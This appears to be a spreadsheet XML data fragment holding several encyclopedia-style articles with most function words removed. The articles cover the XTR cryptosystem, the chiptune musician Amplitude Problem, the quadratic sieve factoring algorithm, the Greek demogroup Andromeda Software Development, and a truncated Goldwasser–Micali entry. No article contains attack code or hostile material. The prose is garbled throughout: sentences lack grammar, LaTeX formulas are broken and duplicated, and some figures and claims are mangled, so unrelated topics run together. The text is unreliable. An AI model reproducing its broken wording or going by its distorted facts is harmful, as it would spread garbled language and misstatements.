computed {\displaystyle tr(g^{k})} published result. given alice's public data {\displaystyle \left(p,q,tr(g),tr(g^{k})\right)} encrypt message {\displaystyle intended alice, using following version elgamal encryption: selects randomly {\displaystyle b\in \mathbb {\displaystyle 1&lt;b&lt;q-2} computes algorithm {\displaystyle s_{b}(tr(g))=\left(tr(g^{b-1}),tr(g^{b}),tr(g^{b+1})\right)\in gf(p^{2})^{3}} next applies algorithm compute {\displaystyle s_{b}(tr(g^{k}))=\left(tr(g^{(b-1)k}),tr(g^{bk}),tr(g^{(b+1)k})\right)\in gf(p^{2})^{3}} determines symmetric encryption {\displaystyle based {\displaystyle tr(g^{bk})\in gf(p^{2})} uses agreed upon symmetric encryption method {\displaystyle encrypt message {\displaystyle resulting encryption {\displaystyle sends {\displaystyle (tr(g^{b}),\ alice.upon receipt {\displaystyle (tr(g^{b}),\ alice decrypts message following way: alice computes {\displaystyle s_{k}(tr(g^{b}))=\left(tr(g^{b(k-1)}),tr(g^{bk}),tr(g^{b(k+1)})\right)\in gf(p^{2})^{3}} alice determines symmetric {\displaystyle based {\displaystyle tr(g^{bk})\in gf(p^{2})} alice uses agreed upon symmetric encryption method {\displaystyle decrypt {\displaystyle resulting original message {\displaystyle .the described encryption scheme based common hybrid version elgamal encryption, secret {\displaystyle obtained asymmetric public system message encrypted symmetric encryption method alice agreed traditional elgamal encryption message restricted space, would {\displaystyle gf(p^{2})} {\displaystyle tr(g)\in gf(p^{2})\ \forall p\in gf(p^{6})^{*}} encryption case multiplication message key, invertible operation space {\displaystyle gf(p^{2})} concretely means wants encrypt message {\displaystyle m\!\ first convert element {\displaystyle {\displaystyle gf(p^{2})} compute encrypted message {\displaystyle {\displaystyle e=k\cdot m\in gf(p^{2})} upon receipt encrypted message {\displaystyle alice recover original message {\displaystyle computing {\displaystyle m=e\cdot k^{-1}} {\displaystyle k^{-1}} inverse {\displaystyle {\displaystyle gf(p^{2})} security order something security properties explained encryption scheme, first important check security group, means hard solve discrete logarithm problem there. next part state equivalency discrete logarithm problem group version discrete logarithm problem, using traces elements. discrete logarithms general {\displaystyle gf\left(p^{t}\right)} {\displaystyle \langle \gamma \rangle multiplicative group order {\displaystyle \omega security diffie–hellman protocol {\displaystyle \langle \gamma \rangle relies diffie–hellman (dh) problem computing given {\displaystyle \gamma ^{xy}{\text{ given }}\gamma ,\gamma ^{x}{\text{ }}\gamma ^{y}} write {\displaystyle dh(\gamma ^{x},\ \gamma ^{y})=\gamma ^{xy}} there problems related problem. first diffie–hellman decision (dhd) problem determine {\displaystyle c=dh(a,b)} given {\displaystyle a,b,c\in \langle \gamma \rangle second discrete logarithm (dl) problem find {\displaystyle x=dl(a)} given {\displaystyle a=\gamma ^{x}\in \langle \gamma \rangle {\text{ }}0\leq x&lt;\omega problem least difficult problem generally assumed problem {\displaystyle \langle \gamma \rangle intractable, two. given prime factorization {\displaystyle \omega problem {\displaystyle \langle \gamma \rangle reduced problem subgroups {\displaystyle \langle \gamma \rangle prime order pohlig–hellman algorithm. hence {\displaystyle \omega safely assumed prime. subgroup {\displaystyle \langle \gamma \rangle prime order {\displaystyle \omega multiplicative group {\displaystyle gf\left(p^{t}\right)^{*}} extension field {\displaystyle gf(p^{t})} {\displaystyle gf(p)} {\displaystyle possible ways attack system. either focus whole multiplicative group subgroup. attack multiplicative group best known method discrete logarithm variant number field sieve alternatively subgroup several methods take {\displaystyle {\mathcal {o}}({\sqrt {\omega }})} operations {\displaystyle \langle \gamma \rangle pollard's method. approaches difficulty problem {\displaystyle \langle \gamma \rangle depends size minimal surrounding subfield {\displaystyle \langle \gamma \rangle size prime order {\displaystyle \omega {\displaystyle gf\left(p^{t}\right)} minimal surrounding subfield {\displaystyle \langle \gamma \rangle {\displaystyle \omega sufficiently large, problem {\displaystyle \langle \gamma \rangle hard general problem {\displaystyle gf\left(p^{t}\right)} parameters chosen {\displaystyle small, {\displaystyle sufficiently large {\displaystyle \langle g\rangle cannot embedded true subfield {\displaystyle gf(p^{6})} since {\displaystyle q\mid p^{2}-p+1} {\displaystyle p^{2}-p+1} divisor {\displaystyle \mid \!gf(p^{6})^{*}\!\mid =p^{6}-1} divide {\displaystyle p^{s}-1{\text{ }}s\in \{1,2,3\}} thus {\displaystyle \langle g\rangle cannot subgroup {\displaystyle gf\!\ (p^{s})^{*}} {\displaystyle s\in \{1,2,3\}} follows problem group assumed hard problem {\displaystyle gf(p^{6})} security cryptographic protocols based discrete logarithms many different types subgroups like groups points elliptic curves subgroups multiplicative group finite field like group. seen versions diffie–hellman elgamal encryption protocol replace using elements group using traces. this means security versions encryption schemes longer based original problems. therefore, versions problems need defined equivalent sense next definition) original problems. definitions: define xtr-dh problem problem computing {\displaystyle tr(g^{xy})} given {\displaystyle tr(g^{x})} {\displaystyle tr(g^{y})} write {\displaystyle xdh(g^{x},\ g^{y})=g^{xy}} xtr-dhd problem problem determining whether {\displaystyle xdh(a,b)=c} {\displaystyle a,b,c\in tr(\langle g\rangle given {\displaystyle a\in tr(\langle g\rangle xtr-dl problem find {\displaystyle x=xdl(a)} i.e. {\displaystyle 0\leq x&lt;q} {\displaystyle a=tr(g^{x})} problem {\displaystyle {\mathcal {a}}} (a,b)-equivalent problem {\displaystyle {\mathcal {b}}} instance problem {\displaystyle {\mathcal {a}}} {\displaystyle {\mathcal {b}}} solved calls algorithm solving problem {\displaystyle {\mathcal {b}}} {\displaystyle {\mathcal {a}}} ).after introducing versions problems next theorem important result telling connection non-xtr problems, fact equivalent. this implies representation elements traces seen above, faster factor usual representation without compromising security. theorem following equivalencies hold: xtr-dl problem (1,1)-equivalent problem {\displaystyle \langle g\rangle xtr-dh problem (1,2)-equivalent problem {\displaystyle \langle g\rangle iii. xtr-dhd problem (3,2)-equivalent problem {\displaystyle \langle g\rangle .this means algorithm solving either xtr-dl, xtr-dh xtr-dhd non-negligible probability transformed algorithm solving corresponding non-xtr problem non-negligible probability vice versa. particular part implies determining small xtr-dh (being element {\displaystyle gf(p^{2})} hard determining whole (being element {\displaystyle gf(p^{6})} representation group {\displaystyle \langle g\rangle references</t>
  </si>
  <si>
    <t>Amplitude Problem</t>
  </si>
  <si>
    <t>juan irming (born december 1974), also known amplitude problem, swedish-american musician producer currently based angeles. while former hacker long career music beginning underground demoscene europe, best known chiptune, synthwave, nerdcore tracks. biography 1974 1992: early life juan irming born swedish parents spanish island mallorca 1974. '80s, irming began frequent local computer store malmö called computer corner. store atari 130xe window irming able program scrolling text displaying store name. store owners impressed, brought preteen paid programmer. time irming discovered life-long passion computer engineering eventually demoscene, phone hacking (phreaking), early cracking underground, computer hacker subculture europe.amplitude problem's track computer corner tribute store's impact formative years young hacker. music video song created german pixel artist valenberg, artist point-and-click cyberpunk video game virtuaverse. 1992 present: immigration juan irming immigrated united states sweden early '90s, attend musicians institute hollywood. after graduation, spent time focus fatherhood programming career. following steps, son, maxwell "max james" irming also earned degree musicians institute pursued professional career software engineering music production. performed main stage together 2019 gathering vegas.irming resides angeles, california currently works senior level software engineer continues produce music. music 1986 1993: demoscene early career juan irming, known time 7an, began european demoscene late '80s member composer atari demo crew hacking group sync. irming's "tracker music" placed first several demo music contests. irming began make extensive vintage home computer hardware commodore atari 130xe, atari productions, favoring sid6581 ym2149 computer sound chips create distinctive style chiptune music. 2014 present: chiptune, synthwave, nerdcore 2014, juan irming, moniker amplitude problem, would produce music american hacker nerdcore rapper ytcracker artists. amplitude problem composed produced video game inspired synth chiptune tracks number projects records. amplitude problem produced ytcracker's cyberpunk album introducing neals released november 2014 fawkes day.amplitude problem's crime curiosity (2019) features well-known american hacker loyd blankenship, also known mentor, reading essay hacker manifesto (originally titled conscience hacker) serves guideline moral code hackers around world. crime curiosity also featured official soundtrack demoscene history book crackers: cracking 1984–1994.amplitude problem produced album blue bots dots released 2015 garnered favorable reviews. 2017, followed-up jazz album frequency modulators orchestra, vol. critics described artificial world high-tech joy, music donkey kong to." tracks album aired jazz radio stations across united states. 2020, irming launched folktronica side-project titled cybard, cover video game assassin's creed valhalla soundtrack full-length album, cmlxxxiv. this followed release cover video game valheim soundtrack. both games heavily feature viking norse themes. amplitude problem featured albums alongside artists like mitch murder, lazerhawk gunship. appeared live events venues con, comic con, game expo ytcracker, dual core, frontalot. influences include first-generation chip composers hubbard, daglish, martin galway maniacs noise addition electronic, industrial, jazz acts damokles, kraftwerk, jean-michel jarre, alphaville, depeche mode, nine inch nails, herbie hancock public enemy. called work "retro-future music geeks, cyberpunks occasional normal human being." craigslist hack marketing stunt november 2014 8pm, massive breach american classifieds website craigslist. attack allegedly part guerrilla marketing campaign ytcracker's album introducing neals amplitude problem lead producer. visitors craigslist website forcibly redirected hacking website digitalgangster.com, following redirect youtube video gizmodo describes "very strange animated video [that] filled ears lyrics freedom, privacy, neutrality".ytcracker denied claims behind attack noted he'd likely accused previous involvement criminal hacking scene. known individual group performed hack. discography hold down (2020) soundtrack (2019) (various artists) world builder (2019) (solo effort) crime curiosity (2019) (featuring inverse phase demoscene/hacking artists) descendants funk (2018) (various artists) collision theory (2017) (various artists) frequency modulators orchestra, vol. (2017) (solo effort) hear living dead (2016) (various artists) synchron assembly (2016) (solo effort) chip wars (2015) (various artists) fight users (2015) (various artists) grid knights (2015) (various artists) coastal keys (2015) (various artists) carpenter (2015) (various artists) blue bots dots (2015) (solo effort) next peak (2015) (various artists) introducing neals (2014) (composition production ytcracker) references external links amplitude problem official website</t>
  </si>
  <si>
    <t>Quadratic sieve</t>
  </si>
  <si>
    <t>quadratic sieve algorithm (qs) integer factorization algorithm and, practice, second fastest method known (after general number field sieve). still fastest integers decimal digits considerably simpler number field sieve. general-purpose factorization algorithm, meaning running time depends solely size integer factored, special structure properties. invented carl pomerance 1981 improvement schroeppel's linear sieve. basic algorithm attempts congruence squares modulo (the integer factorized), often leads factorization algorithm works phases: data collection phase, collects information lead congruence squares; data processing phase, puts data collected matrix solves obtain congruence squares. data collection phase easily parallelized many processors, data processing phase requires large amounts memory, difficult parallelize efficiently many nodes processing nodes enough memory store whole matrix. block wiedemann algorithm used case systems capable holding matrix. naive approach finding congruence squares pick random number, square divide hope least non-negative remainder perfect square. example, 5959 {\displaystyle 80^{2}\equiv 441=21^{2}{\pmod {5959}}} this approach finds congruence squares rarely large find one, often not, congruence nontrivial factorization complete. this roughly basis fermat's factorization method. quadratic sieve modification dixon's factorization method. general running time required quadratic sieve factor integer {\displaystyle e^{(1+o(1)){\sqrt {\ln n\ln n}}}=l_{n}\left[1/2,1\right]} l-notation.the constant base natural logarithm. approach factorize integer fermat's method entails search single number n1/2 n−1, remainder divided square. hard find. quadratic sieve consists computing remainder a2/n several finding subset whose product square. this yield congruence squares. example, consider attempting factor number 1649. have: 1649 {\displaystyle 41^{2}\equiv 32,42^{2}\equiv 115,43^{2}\equiv 200{\pmod {1649}}} none integers {\displaystyle 32,115,200} square, product {\displaystyle 32\cdot 200=80^{2}} square. also 1649 {\displaystyle 32\cdot 200\equiv 41^{2}\cdot 43^{2}=(41\cdot 43)^{2}\equiv 114^{2}{\pmod {1649}}} since 1649 {\displaystyle 41\cdot 43\equiv 114{\pmod {1649}}} observation {\displaystyle 32\cdot 200=80^{2}} thus gives congruence squares 1649 {\displaystyle 114^{2}\equiv 80^{2}{\pmod {1649}}.} hence 1649 {\displaystyle 114^{2}-80^{2}=(114+80)\cdot (114-80)=194\cdot 34=k\cdot 1649} integer {\displaystyle factor 1649 1649 1649 {\displaystyle 1649=\gcd(194,1649)\cdot \gcd(34,1649)=97\cdot using euclidean algorithm calculate greatest common divisor. problem reduced given integers, find subset whose product square. fundamental theorem arithmetic, positive integer written uniquely product prime powers. vector format; example, prime-power factorization 23325071, therefore represented exponent vector (3,2,0,1). multiplying integers corresponds adding exponent vectors. number square exponent vector even every coordinate. example, vectors (3,2,0,1) (1,0,0,1) (4,2,0,2), (504)(14) square. searching square requires knowledge parity numbers vectors, sufficient compute vectors (1,0,0,1) (1,0,0,1) (0,0,0,0). given (0,1)-vectors, need find subset adds zero vector this linear algebra problem since ring {\displaystyle \mathbb /2\mathbb regarded galois field order divide non-zero numbers (there one, namely calculating modulo theorem linear algebra vectors vector entries, linear dependency always exists. found gaussian elimination. however, simply squaring many random numbers produces large number different prime factors, long vectors large matrix. trick look specifically numbers small prime factors (they smooth numbers). they harder find, using smooth numbers keeps vectors matrices smaller tractable. quadratic sieve searches smooth numbers using technique called sieving, discussed later, algorithm takes name. algorithm summarize, basic quadratic sieve algorithm main steps: choose smoothness bound number π(b), denoting number prime numbers less control length vectors number vectors needed. sieving locate π(b) numbers (ai2 b-smooth. factor generate exponent vectors one. linear algebra find subset vectors zero vector. multiply corresponding together give result name similarly, multiply together yields b-smooth square left equality square roots taking square root integers namely computed step desired identity: {\displaystyle (a+b)(a-b)\equiv 0{\pmod {n}}} compute difference sum) this produces factor, although trivial factor factor trivial, different linear dependency different a.the remainder article explains details extensions basic algorithm. algorithm's pseudo code algorithm quadratic sieve choose smoothness bound {\displaystyle {\displaystyle t=\pi (b)} {\displaystyle i\in {1,...,t+1}} choose {\displaystyle x\in \{0,\pm 1,\pm 2,...\}} {\displaystyle a_{i}=x+\lfloor {\sqrt {n}}\rfloor {\displaystyle b_{i}=a_{i}^{2}-n} (where {\displaystyle b_{i}=\prod _{j=1}^{t}p_{j}^{e_{i,j}}} (check-p_t-smooth(b_i) false) {\displaystyle v_{i}=(v_{i,1},v_{i,2},...,v_{i,t})=(e_{i,1}{\bmod {2}},e_{i,2}{\bmod {2}},...,e_{i,t}{\bmod {2}})} find {\displaystyle t\subseteq \{1,2,...,t+1\}:\sum _{i\in t}v_{i}=0\in \mathbb _{2}} {\displaystyle x=\prod _{i\in t}a_{i}{\bmod {n}}} {\displaystyle y=\prod _{j=1}^{t}p_{j}^{\sum _{i\in t}e_{i,j}}{\bmod {n}}} {\displaystyle x\not \equiv -y{\bmod {n}}} {\displaystyle x\not \equiv return gcd(x gcd(x else return main loop. optimizes finding congruences quadratic sieve attempts find pairs integers y(x) (where y(x) function satisfying much weaker condition (mod selects primes called factor base, attempts find least absolute remainder y(x) factorizes completely factor base. such values said smooth respect factor base. factorization value y(x) splits factor base, together value known relation. quadratic sieve speeds process finding relations taking close square root this ensures y(x) smaller, thus greater chance smooth. (where small integer) {\displaystyle y(x)=\left(\left\lceil {\sqrt {n}}\right\rceil +x\right)^{2}-n{\hbox{ (where }}x{\hbox{ small integer)}}} {\displaystyle y(x)\approx 2x\left\lceil {\sqrt {n}}\right\rceil this implies order 2x[√n]. however, also implies grows linearly times square root another increase chance smoothness simply increasing size factor base. however, necessary find least smooth relation number primes factor base, ensure existence linear dependency. partial relations cycles even relation y(x) smooth, possible merge partial relations form full one, products prime(s) outside factor base. [note equivalent extending factor base.] example, factor base partial relations: {\displaystyle {21^{2}\equiv 7^{1}\cdot 11{\pmod {91}}}} {\displaystyle {29^{2}\equiv 2^{1}\cdot 11{\pmod {91}}}} multiply together: {\displaystyle {(21\cdot 29)^{2}\equiv 2^{1}\cdot 7^{1}\cdot 11^{2}{\pmod {91}}}} multiply sides (11−1)2 modulo 11−1 modulo {\displaystyle (58\cdot 21\cdot 29)^{2}\equiv 2^{1}\cdot 7^{1}{\pmod {91}}} {\displaystyle 14^{2}\equiv 2^{1}\cdot 7^{1}{\pmod {91}}} producing full relation. such full relation (obtained combining partial relations) called cycle. sometimes, forming cycle partial relations leads directly congruence squares, rarely. checking smoothness sieving there several ways check smoothness obvious trial division, although increases running time data collection phase. another method acceptance elliptic curve method (ecm). practice, process called sieving typically used. f(x) polynomial {\displaystyle f(x)=x^{2}-n} {\displaystyle f(x)=x^{2}-n} {\displaystyle f(x+kp)=(x+kp)^{2}-n} {\displaystyle f(x+kp)=x^{2}+2xkp+(kp)^{2}-n} {\displaystyle f(x+kp)=f(x)+2xkp+(kp)^{2}\equiv f(x){\pmod {p}}} thus solving f(x) (mod generates whole sequence numbers y=f(x), divisible this finding square root modulo prime, exist efficient algorithms, shanks–tonelli algorithm. (this quadratic sieve gets name: quadratic polynomial sieving process works like sieve eratosthenes.) sieve starts setting every entry large array bytes zero. solve quadratic equation roots approximation log(p) every entry y(x) a[kp a[kp also necessary solve quadratic equation modulo small powers order recognise numbers divisible small powers factor-base prime. factor base, containing value threshold roughly log(x2−n) correspond value y(x) splits factor base. information exactly primes divide y(x) lost, small factors, many good algorithms factoring number known small factors, trial division small primes, squfof, pollard rho, ecm, usually used combination. there many y(x) values work, factorization process entirely reliable; often processes misbehave inputs, requiring small amount extra sieving. example basic sieve this example demonstrate standard quadratic sieve without logarithm optimizations prime powers. number factored 15347, therefore ceiling square root 124. since small, basic polynomial enough: y(x) 124)2 15347. data collection since small, primes necessary. first primes 15347 square root words, 15347 quadratic residue modulo primes). these primes basis sieving. construct sieve {\displaystyle v_{x}} 15347 {\displaystyle y(x)=(x+\lceil {\sqrt {n}}\rceil )^{2}-n=(x+124)^{2}-15347} begin sieving process prime basis, choosing sieve first y(x): 1037 1294 34382 {\displaystyle {\begin{aligned}v&amp;={\begin{bmatrix}y(0)&amp;y(1)&amp;y(2)&amp;y(3)&amp;y(4)&amp;y(5)&amp;\cdots &amp;y(99)\end{bmatrix}}\\&amp;={\begin{bmatrix}29&amp;278&amp;529&amp;782&amp;1037&amp;1294&amp;\cdots &amp;34382\end{bmatrix}}\end{aligned}}} next step perform sieve. factor base {\displaystyle \lbrace 2,17,23,29\rbrace solve equation {\displaystyle y(x)\equiv (x+\lceil {\sqrt {n}}\rceil )^{2}-n\equiv 0{\pmod {p}}} find entries array divisible {\displaystyle p=2} solve 15347 {\displaystyle (x+124)^{2}-15347\equiv 0{\pmod {2}}} solution 15347 {\displaystyle x\equiv {\sqrt {15347}}-124\equiv 1{\pmod {2}}} thus, starting incrementing entry divisible dividing entries yields 1037 17191 {\displaystyle v={\begin{bmatrix}29&amp;139&amp;529&amp;391&amp;1037&amp;647&amp;\cdots &amp;17191\end{bmatrix}}} similarly remaining primes {\displaystyle \lbrace 17,23,29\rbrace equation 15347 {\displaystyle x\equiv {\sqrt {15347}}-124{\pmod {p}}} solved. note every resulting linear equations modular square roots. 15347 15347 15347 {\displaystyle {\begin{aligned}x&amp;\equiv {\sqrt {15347}}-124&amp;\equiv 8-124&amp;\equiv 3{\pmod {17}}\\&amp;&amp;\equiv 9-124&amp;\equiv 4{\pmod {17}}\\x&amp;\equiv {\sqrt {15347}}-124&amp;\equiv 11-124&amp;\equiv 2{\pmod {23}}\\&amp;&amp;\equiv 12-124&amp;\equiv 3{\pmod {23}}\\x&amp;\equiv {\sqrt {15347}}-124&amp;\equiv 8-124&amp;\equiv 0{\pmod {29}}\\&amp;&amp;\equiv 21-124&amp;\equiv 13{\pmod {29}}\\\end{aligned}}} each equation {\displaystyle x\equiv a{\pmod {p}}} results {\displaystyle v_{x}} divisible value beyond that. dividing a+p, a+2p, a+3p, etc., prime basis finds smooth numbers products unique primes (first powers). 17191 {\displaystyle v={\begin{bmatrix}1&amp;139&amp;23&amp;1&amp;61&amp;647&amp;\cdots &amp;17191\end{bmatrix}}} entry equals corresponds smooth number. since {\displaystyle v_{0}} {\displaystyle v_{3}} {\displaystyle v_{71}} equal one, corresponds matrix processing since smooth numbers found property {\displaystyle y\equiv z^{2}{\pmod {n}}} remainder algorithm follows equivalently variation dixon's factorization method. writing exponents product subset equations 22678 {\displaystyle {\begin{aligned}29&amp;=2^{0}\cdot 17^{0}\cdot 23^{0}\cdot 29^{1}\\782&amp;=2^{1}\cdot 17^{1}\cdot 23^{1}\cdot 29^{0}\\22678&amp;=2^{1}\cdot 17^{1}\cdot 23^{1}\cdot 29^{1}\\\end{aligned}}} matrix {\displaystyle {\pmod {2}}} yields: {\displaystyle s\cdot {\begin{bmatrix}0&amp;0&amp;0&amp;1\\1&amp;1&amp;1&amp;0\\1&amp;1&amp;1&amp;1\end{bmatrix}}\equiv {\begin{bmatrix}0&amp;0&amp;0&amp;0\end{bmatrix}}{\pmod {2}}} solution equation given left null space, simply {\displaystyle s={\begin{bmatrix}1&amp;1&amp;1\end{bmatrix}}} thus product equations yields square (mod 22678 22678 {\displaystyle 29\cdot 782\cdot 22678=22678^{2}} 3070860 {\displaystyle 124^{2}\cdot 127^{2}\cdot 195^{2}=3070860^{2}} algorithm found 22678 3070860 15347 {\displaystyle 22678^{2}\equiv 3070860^{2}{\pmod {15347}}} testing result yields gcd(3070860 22678, 15347) 103, nontrivial factor 15347, 149. this demonstration also serve show quadratic sieve appropriate large. number small 15347, algorithm overkill. trial division pollard could found factor much less computation. multiple polynomials practice, many different polynomials used since polynomial typically provide enough pairs smooth factor base. polynomials used must special form, since need squares modulo polynomials must similar form original y(x) {\displaystyle y(x)=(ax+b)^{2}-n\qquad a,b\in \mathbb assuming {\displaystyle b^{2}-n} multiple {\displaystyle b^{2}-n=ac} polynomial y(x) written {\displaystyle y(x)=a\cdot (ax^{2}+2bx+c)} square, factor {\displaystyle (ax^{2}+2bx+c)} considered. this approach (called mpqs, multiple polynomial quadratic sieve) ideally suited parallelization, since processor involved factorization given factor base collection polynomials, need communicate central processor finished polynomials. large primes large prime dividing factors less remaining part number (the cofactor) less cofactor must prime. effect, added factor base, sorting list relations order cofactor. y(a) 7*11*23*137 y(b) 3*5*7*137, y(a)y(b) 3*5*11*23 1372. this works reducing threshold entries sieving array full factorization performed. more large primes reducing threshold even further, using effective process factoring y(x) values products even relatively large primes superb find relations factors factor base, even three larger primes. cycle finding allows combining relations sharing several primes single relation. parameters realistic example illustrate typical parameter choices realistic example real implementation including multiple polynomial large prime optimizations, tool msieve 267-bit semiprime, producing following parameters: trial factoring cutoff: bits sieve interval (per polynomial): 393216 blocks size 32768) smoothness bound: 1300967 (50294 primes) number factors polynomial coefficients: (see multiple polynomials above) large prime bound: 128795733 bits) (see large primes above) smooth values found: 25952 sieving directly, 24462 combining numbers large primes final matrix size: 50294 50414, reduced filtering 35750 35862 nontrivial dependencies found: total time ultrasparc iii): seconds maximum memory used: factoring records until discovery number field sieve (nfs), asymptotically fastest known general-purpose factoring algorithm. now, lenstra elliptic curve factorization asymptotic running time case exactly prime factors equal size), practice, faster since uses single-precision operations instead multi-precision operations used elliptic curve method. april 1994, factorization rsa-129 completed using 129-digit number, product large primes, digits factor base factorization contained 524339 primes. data collection phase took 5000 mips-years, done distributed fashion internet. data collected totaled 2gb. data processing phase took hours bellcore's (now telcordia technologies) maspar (massively parallel) supercomputer. this largest published factorization general-purpose algorithm, used factor rsa-130, completed april 1996. numbers factored since factored using nfs. current factorization record digit (463 bit) rsa-140, factored patrick konsor june 2020 using approximately 6,000 core hours days. implementations ppmpqs ppsiqs mpqs simpqs fast implementation self-initialising multiple polynomial quadratic sieve written william hart. provides support large prime variant uses jason papadopoulos' block lanczos code linear algebra stage. simpqs accessible qsieve command sagemath computer algebra package downloaded source form. simpqs optimized athlon opteron machines, operate common 64-bit architectures. written entirely factoring applet dario alpern, uses quadratic sieve certain conditions met. pari/gp computer algebra package includes implementation self-initialising multiple polynomial quadratic sieve implementing large prime variant. adapted thomas papanikolaou xavier roblot sieve written lidia project. self initialisation scheme based idea thesis thomas sosnowski. variant quadratic sieve available magma computer algebra package. based implementation arjen lenstra 1995, used "factoring email" program. msieve, implementation multiple polynomial quadratic sieve support single double large primes, written jason papadopoulos. source code windows binary available. yafu, written buhrow, similar msieve faster modern processors. uses jason papadopoulos' block lanczos code. source code binaries windows linux available. ariel, simple java implementation quadratic sieve didactic purposes. java-math-library contains probably fastest quadratic sieve written java (the successor psiqs 4.0). java open source java project containing basic implementation released february 2016 ilya gazman quadratic sieve, factorizer written entirely containing implementation self-initialising quadratic sieve. project mathematically inspired william hart's flint factorizer. source released 2022 michel leonard rely external library, capable factoring 220-bit numbers minute. rcppbigintalgos package joseph wood, provides efficient implementation multiple polynomial quadratic sieve programming language. written capable comfortably factoring digit semiprimes. example, rsa-100 factored hours quad-core intel core personal computer. also lenstra elliptic curve factorization primality test references samuel wagstaff, (2013). factoring. providence, american mathematical society. 195–202. isbn 978-1-4704-1048-3. other external links reference paper "the quadratic sieve factoring algorithm" eric landquist</t>
  </si>
  <si>
    <t>Andromeda Software Development</t>
  </si>
  <si>
    <t>andromeda software development (abbreviated asd) greek demogroup formed 1992. they produced number small intros demos mid-1990s notably counterfactual (winner first greek demo party ever, gardening 1995) beyond (placed gardening 1996). quiet following years 2001, presented cadence cascade first accelerated demo digital nexus demoparty, held athens, greece. from 2002 onwards, started participating major demoscene competitions, eventually winning assembly 2005 demo competition iconoclast. associated norwegian demo group andromeda, however, collaborated archmage andromeda production 2007 assembly demo competition winner lifeforce. style accelerated era, established demogroup extremely distinctive style. visually, demos featured dynamic coherent flows abstract visual elements subtly blending various unexpected ways, often point viewer able distinguish start- endpoints effect. this many debates considering demos, viewers praise type design, others consider unnecessary amalgam otherwise unrelated visual effects. musicians group (amusic leviathan, dreamchild) venture territory progressive metal, akin commercial bands dream theater liquid tension experiment. their songs often feature live instruments, variating tempo time signatures, constantly changing musical textures showcase remarkable proficiency composers. members active members navis (kostas pataridis) code amoivikos (nikos batalas) graphics (stathis sideris) graphics (george cherouvim) graphics amusic (sotiris varotsis) music leviathan (fotis panetsos) music former inactive guest members incus code nina code odette modelling matilda vocals liska vocals modelling roscoe vocals nova graphics pindaros music releases ms-dos demo5 (1992) cosmos demos series series demos released 1993–1995 vertex megademo (1993) digital dreams (1993) counter factual finished gardening 1995 beyond finished gardening 1996 windows cadence cascade finished digital nexus 2001 edge forever finished react 2002 blue wire finished react 2002 dreamchild finished assembly 2003 finished react 2004 planet risk finished assembly 2004 pixelshow invitation (2005) ambience masses finished gathering 2005 aphorism masses finished 13th breakpoint 2005 antidote masses finished pixelshow 2005 iconoclast finished assembly 2005 pixelshow invitation (2006) animal attraction finished gathering 2006 captive game finished gathering 2006 gamedev compo captive finished breakpoint 2006 evolution vision finished sundown 2006 lithography finished intel demo trailer compo 2006 beyond walls eryx finished second intel demo competition 2007 lifeforce finished assembly 2007 zine headlines (2008) metamorphosis finished breakpoint 2008 realtime generation (made fairlight alcatraz) finished outline 2008 size antimatters finished euskal encounter 2008 midnight finished nvscene 2008 rupture finished gathering 2009 chameleon finished evoke 2009 wind wings finished euskal encounter 2010 happiness around bend finished assembly 2010 anoxia redux finished main demo party 2010 electric bullet finished trsac 2010 butterfly effect finished euskal encounter 2011 spin finished assembly 2011 monolith finished assembly 2015 your love finished assembly summer 2018 awards scene.org awards 2003 best soundtrack nomination (dreamchild) scene.org awards 2003 public's choice nomination (dreamchild) scene.org awards 2004 best demo award (planet risk) scene.org awards 2004 best soundtrack nomination (planet risk) scene.org awards 2004 best effects nomination (planet risk) scene.org awards 2004 public's choice award (planet risk) scene.org awards 2005 best demo nomination (iconoclast) scene.org awards 2005 best effects nomination (iconoclast) scene.org awards 2005 best soundtrack nomination (iconoclast) scene.org awards 2005 best direction nomination (iconoclast) scene.org awards 2005 public's choice award (iconoclast) scene.org awards 2006 best soundtrack nomination (animal attraction) scene.org awards 2006 best effects award (the evolution vision) scene.org awards 2006 most original concept nomination (the evolution vision) scene.org awards 2006 most original concept nomination (captive) scene.org awards 2006 public's choice nomination (animal attraction) scene.org awards 2007 best demo award (lifeforce) scene.org awards 2007 best effects award (lifeforce) scene.org awards 2007 public's choice award (lifeforce) scene.org awards 2007 best direction nomination (lifeforce) scene.org awards 2007 best direction nomination (beyond walls eryx) scene.org awards 2007 most original concept nomination (beyond walls eryx) scene.org awards 2007 best graphics nomination (lifeforce) scene.org awards 2007 best soundtrack nomination (lifeforce) scene.org awards 2008 best soundtrack award (midnight run) scene.org awards 2008 best direction nomination (midnight run) scene.org awards 2008 most original concept nomination (metamorphosis) scene.org awards 2008 best demo nomination (metamorphosis) scene.org awards 2008 best effects nomination (size antimatters) scene.org awards 2008 best graphics nomination (size antimatters) scene.org awards 2008 best effects nomination (realtime generation) scene.org awards 2009 public's choice award (rupture) scene.org awards 2009 best demo award (rupture) scene.org awards 2009 best direction award (rupture) scene.org awards 2009 best direction nomination (chameleon) scene.org awards 2009 best effects nomination (rupture) scene.org awards 2009 best graphics nomination (rupture) scene.org awards 2009 best soundtrack nomination (rupture) scene.org awards 2009 best soundtrack nomination (chameleon) scene.org awards 2010 best demo nomination (happiness around bend) scene.org awards 2010 best effects nomination (happiness around bend) scene.org awards 2010 best graphics nomination (happiness around bend) scene.org awards 2010 best direction nomination (happiness around bend) scene.org awards 2010 public's choice nomination (happiness around bend) 2006 best realtime demo nomination (iconoclast) bitfilm festival 2008 winner realtime category (lifeforce) animatu 2009 winner demoscene competition assembly 2003 place (dreamchild) assembly 2004 place (planet risk) assembly 2005 winner (iconoclast) assembly 2007 winner (lifeforce assembly 2010 winner (happiness around bend) assembly 2011 winner (spin) assembly 2015 winner (monolith) external links home page page pouet.net</t>
  </si>
  <si>
    <t>Goldwasser–Micali cryptosystem</t>
  </si>
  <si>
    <t>goldwasser–micali (gm) cryptosystem asymmetric encryption algorithm developed shafi goldwasser silvio micali 1982. distinction first probabilistic public-key encryption scheme provably secure standard cryptographic assumptions. however, efficient cryptosystem, ciphertexts several hundred times larger initial plaintext. prove security properties cryptosystem, goldwasser micali proposed widely used definition semantic security. basis cryptosystem semantically secure based assumed intractability quadratic residuosity problem modulo composite large primes. this assumption states given difficult determine whether quadratic residue modulo (i.e., jacobi symbol quadratic residue problem easily solved given factorization quadratic residues generated party, even without knowledge factorization. cryptosystem leverages asymmetry encrypting individual plaintext bits either random quadratic residues non-residues modulo quadratic residue symbol recipients factorization secret key, decrypt message testing quadratic residuosity received ciphertext values. because goldwasser–micali produces value size approximately encrypt every single plaintext, encryption results substantial ciphertext expansion. prevent factorization attacks, recommended several hundred bits more. thus, scheme serves mainly proof concept, efficient provably-secure schemes elgamal developed since. because 